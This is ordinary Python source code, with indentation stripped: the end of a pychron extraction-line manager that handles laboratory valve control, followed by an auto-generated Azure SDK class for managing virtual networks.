self.gauge_manager.start_scans()
if self.switch_manager and self.use_hardware_update:
do_after(1000, self._update)
def _update(self):
if self.use_hardware_update and self._active:
self.switch_manager.load_hardware_states()
self.switch_manager.load_valve_owners()
do_after(self.hardware_update_period * 1000, self._update)
def _deactivate_hook(self):
pass
def _reload_canvas_hook(self):
pass
def _log_spec_event(self, name, action):
sm = self.application.get_service('pychron.spectrometer.scan_manager.ScanManager')
if sm:
color = 0x98FF98 if action == 'open' else 0xFF9A9A
sm.add_spec_event_marker('{} ({})'.format(name, action),
mode='valve',
extra=name,
bgcolor=color)
def _enable_valve(self, description, state):
if self.switch_manager:
valve = self.switch_manager.get_valve_by_description(description)
if valve is None:
valve = self.switch_manager.get_switch_by_name(description)
if valve is not None:
if not state:
self.close_valve(valve.name)
valve.enabled = state
def _lock_valve(self, name, action, description=None, address=None, **kw):
"""
:param name:
        :param action: bool; True == lock, False == unlock
:param description:
:param kw:
:return:
"""
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name=name)
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False
v = vm.get_switch_by_name(name)
if action:
v.lock()
else:
v.unlock()
self.update_switch_lock_state(name, action)
self.refresh_canvas()
return True
def _open_close_valve(self, name, action, description=None, address=None, mode='remote', **kw):
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name)
# check if specified valve is in the valves.xml file
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False, False
result = self._change_switch_state(name, mode, action, **kw)
self.debug('open_close_valve, mode={} result={}'.format(mode, result))
if mode == 'script':
invoke_in_main_thread(self.refresh_canvas)
if result:
if all(result):
valve = vm.get_switch_by_name(name)
description = valve.description
self._log_spec_event(name, action)
self.info('{:<6s} {} ({})'.format(action.upper(), valve.name, description),
color='red' if action == 'close' else 'green')
vm.actuate_children(name, action, mode)
ld = self.link_valve_actuation_dict
if ld:
try:
func = ld[name]
func(name, action)
except KeyError:
self.debug('name="{}" not in '
'link_valve_actuation_dict. keys={}'.format(name, ','.join(list(ld.keys()))))
return result
def _change_switch_state(self, name, mode, action, sender_address=None, **kw):
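        # Returns a (result, change) tuple: ``result`` is the outcome reported
        # by the switch manager's open/close call, and ``change`` is True only
        # when the valve state actually changed (which triggers the canvas
        # state update below).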
result, change = False, False
if self._check_ownership(name, sender_address):
func = getattr(self.switch_manager, '{}_by_name'.format(action))
ret = func(name, mode=mode, **kw)
self.debug('change switch state name={} action={} ret={}'.format(name, action, ret))
if ret:
result, change = ret
if isinstance(result, bool):
if change:
self.update_switch_state(name, True if action == 'open' else False)
return result, change
def _check_ownership(self, name, requestor, force=False):
"""
        Check if this valve is owned by another client.

        If this is not a client but you want it to respect valve ownership,
        set ``check_master_owner=True``.
"""
ret = True
if force or self.check_master_owner:
if requestor is None:
requestor = gethostbyname(gethostname())
self.debug('checking ownership. requestor={}'.format(requestor))
try:
v = self.switch_manager.switches[name]
ret = not (v.owner and v.owner != requestor)
except KeyError:
pass
return ret
def _set_pipette_counts(self, name, value):
for c in self.canvases:
scene = c.canvas2D.scene
obj = scene.get_item('vlabel_{}Pipette'.format(name))
if obj is not None:
obj.value = int(value)
c.refresh()
def _sample_changer_factory(self):
sc = self.sample_changer
if sc is None:
sc = SampleChanger(manager=self)
if sc.setup():
result = sc.edit_traits(view='chamber_select_view')
if result:
if sc.chamber and sc.chamber != NULL_STR:
self.sample_changer = sc
return sc
def _create_manager(self, klass, manager, params, **kw):
# try a lazy load of the required module
# if 'fusions' in manager:
# package = 'pychron.managers.laser_managers.{}'.format(manager)
# self.laser_manager_id = manager
if 'rpc' in manager:
package = 'pychron.rpc.manager'
else:
package = 'pychron.managers.{}'.format(manager)
if manager in ('switch_manager', 'gauge_manager', 'multiplexer_manager', 'cryo_manager'):
if manager == 'switch_manager':
man = self._switch_manager_factory()
self.switch_manager = man
return man
else:
return getattr(self, manager)
else:
class_factory = self.get_manager_factory(package, klass, warn=False)
if class_factory is None:
package = 'pychron.extraction_line.{}'.format(manager)
class_factory = self.get_manager_factory(package, klass)
if class_factory:
m = class_factory(**params)
self.add_trait(manager, m)
return m
else:
self.debug('could not create manager {}, {},{},{}'.format(klass, manager, params, kw))
def _set_logger_level(self, obj=None):
level = LOG_LEVELS.get(self.logging_level, logging.DEBUG)
getattr(obj, 'logger').setLevel(level)
if hasattr(obj, 'set_logger_level_hook'):
obj.set_logger_level_hook(level)
# ===============================================================================
# handlers
# ===============================================================================
def _logging_level_changed(self, new):
if new:
self._set_logger_level(self)
if self.switch_manager:
self._set_logger_level(self.switch_manager)
@on_trait_change('use_hardware_update')
def _update_use_hardware_update(self):
if self.use_hardware_update:
do_after(1000, self._update)
@on_trait_change('switch_manager:pipette_trackers:counts')
def _update_pipette_counts(self, obj, name, old, new):
self._set_pipette_counts(obj.name, new)
@on_trait_change('use_network,network:inherit_state')
def _update_network(self):
from pychron.canvas.canvas2D.scene.primitives.valves import Valve
if not self.use_network:
for c in self.canvases:
scene = c.canvas2D.scene
for item in scene.get_items():
if not isinstance(item, Valve):
item.active_color = item.default_color
else:
item.active_color = item.oactive_color
else:
net = self.network
if self.switch_manager:
for k, vi in self.switch_manager.switches.items():
net.set_valve_state(k, vi.state)
self.reload_canvas()
@on_trait_change('display_volume,volume_key')
def _update_canvas_inspector(self, name, new):
for c in self.canvases:
c.canvas2D.trait_set(**{name: new})
def _handle_state(self, new):
# self.debug('handle state {}'.format(new))
if isinstance(new, tuple):
self.update_switch_state(*new)
else:
# n = len(new)
for i, ni in enumerate(new):
self.update_switch_state(*ni)
# self.update_switch_state(refresh=i == n - 1, *ni)
def _handle_lock_state(self, new):
self.debug('refresh_lock_state fired. {}'.format(new))
self.update_switch_lock_state(*new)
def _handle_owned_state(self, new):
self.update_switch_owned_state(*new)
def _handle_refresh_canvas(self, new):
# self.debug('refresh_canvas_needed fired')
self.refresh_canvas()
def _handle_console_message(self, new):
color = None
if isinstance(new, tuple):
msg, color = new
else:
msg = new
if color is None:
color = self.console_default_color
if self.console_display:
self.console_display.add_text(msg, color=color)
# ===============================================================================
# defaults
# ===============================================================================
def _cryo_manager_default(self):
from pychron.extraction_line.cryo_manager import CryoManager
return CryoManager(application=self.application)
def _gauge_manager_default(self):
from pychron.extraction_line.gauge_manager import GaugeManager
return GaugeManager(application=self.application)
def _switch_manager_factory(self):
klass = self._get_switch_manager_klass()
vm = klass(application=self.application)
vm.on_trait_change(self._handle_state, 'refresh_state')
vm.on_trait_change(self._handle_lock_state, 'refresh_lock_state')
vm.on_trait_change(self._handle_owned_state, 'refresh_owned_state')
vm.on_trait_change(self._handle_refresh_canvas, 'refresh_canvas_needed')
vm.on_trait_change(self._handle_console_message, 'console_message')
bind_preference(vm, 'valves_path', 'pychron.extraction_line.valves_path')
return vm
def _get_switch_manager_klass(self):
from pychron.extraction_line.switch_manager import SwitchManager
return SwitchManager
def _explanation_default(self):
e = ExtractionLineExplanation()
if self.switch_manager is not None:
e.load(self.switch_manager.switches)
self.switch_manager.on_trait_change(e.refresh, 'refresh_explanation')
return e
def _canvas_default(self):
return self.new_canvas()
def _network_default(self):
return ExtractionLineGraph()
if __name__ == '__main__':
elm = ExtractionLineManager()
elm.bootstrap()
elm.canvas.style = '2D'
elm.configure_traits()
# =================== EOF ================================
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualNetworksOperations(object):
"""VirtualNetworksOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
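    # Hedged usage sketch (``network_client`` is illustrative, not defined in
    # this file):
    #   poller = network_client.virtual_networks.begin_delete('my-rg', 'my-vnet')
    #   poller.result()  # block until the long-running delete completes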
def get(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
"""Gets the specified virtual network by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualNetwork, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_06_01.models.VirtualNetwork
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
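    # Hedged usage sketch (names are illustrative):
    #   vnet = network_client.virtual_networks.get('my-rg', 'my-vnet')
    #   print(vnet.name, vnet.location)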
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.VirtualNetwork"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualNetwork')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.VirtualNetwork"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualNetwork"]
"""Creates or updates a virtual network in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to the create or update virtual network operation.
:type parameters: ~azure.mgmt.network.v2019_06_01.models.VirtualNetwork
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualNetwork or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_06_01.models.VirtualNetwork]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
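    # Illustrative usage sketch (not part of the generated module): creating or
    # updating a virtual network via the LRO above. A plain dict is accepted for
    # `parameters` and is serialized as a VirtualNetwork; `client` and all names
    # below are placeholders/assumptions.
    #
    #   poller = client.virtual_networks.begin_create_or_update(
    #       "example-rg",
    #       "example-vnet",
    #       {
    #           "location": "westus",
    #           "address_space": {"address_prefixes": ["10.0.0.0/16"]},
    #       },
    #   )
    #   vnet = poller.result()  # blocks until provisioning finishes
    #   print(vnet.provisioning_state)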
def _update_tags_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualNetwork"]
"""Updates a virtual network tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to update virtual network tags.
:type parameters: ~azure.mgmt.network.v2019_06_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualNetwork or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_06_01.models.VirtualNetwork]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
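    # Illustrative usage sketch (not part of the generated module): patching only the
    # tags with the LRO above. The TagsObject body may be supplied as a dict; `client`
    # is assumed as in the earlier sketches.
    #
    #   poller = client.virtual_networks.begin_update_tags(
    #       "example-rg", "example-vnet", {"tags": {"env": "dev", "owner": "netops"}}
    #   )
    #   print(poller.result().tags)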
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListResult"]
"""Gets all virtual networks in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualNetworks'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListResult"]
"""Gets all virtual networks in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks'} # type: ignore
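    # Illustrative usage sketch (not part of the generated module): both list() and
    # list_all() return an ItemPaged iterator that transparently follows nextLink, so
    # callers simply iterate. `client` is assumed as in the earlier sketches.
    #
    #   for vnet in client.virtual_networks.list("example-rg"):
    #       print(vnet.name, vnet.location)
    #   total = sum(1 for _ in client.virtual_networks.list_all())
    #   print("virtual networks in subscription:", total)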
def check_ip_address_availability(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
ip_address, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.IPAddressAvailabilityResult"
"""Checks whether a private IP address is available for use.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param ip_address: The private IP address to be verified.
:type ip_address: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IPAddressAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_06_01.models.IPAddressAvailabilityResult
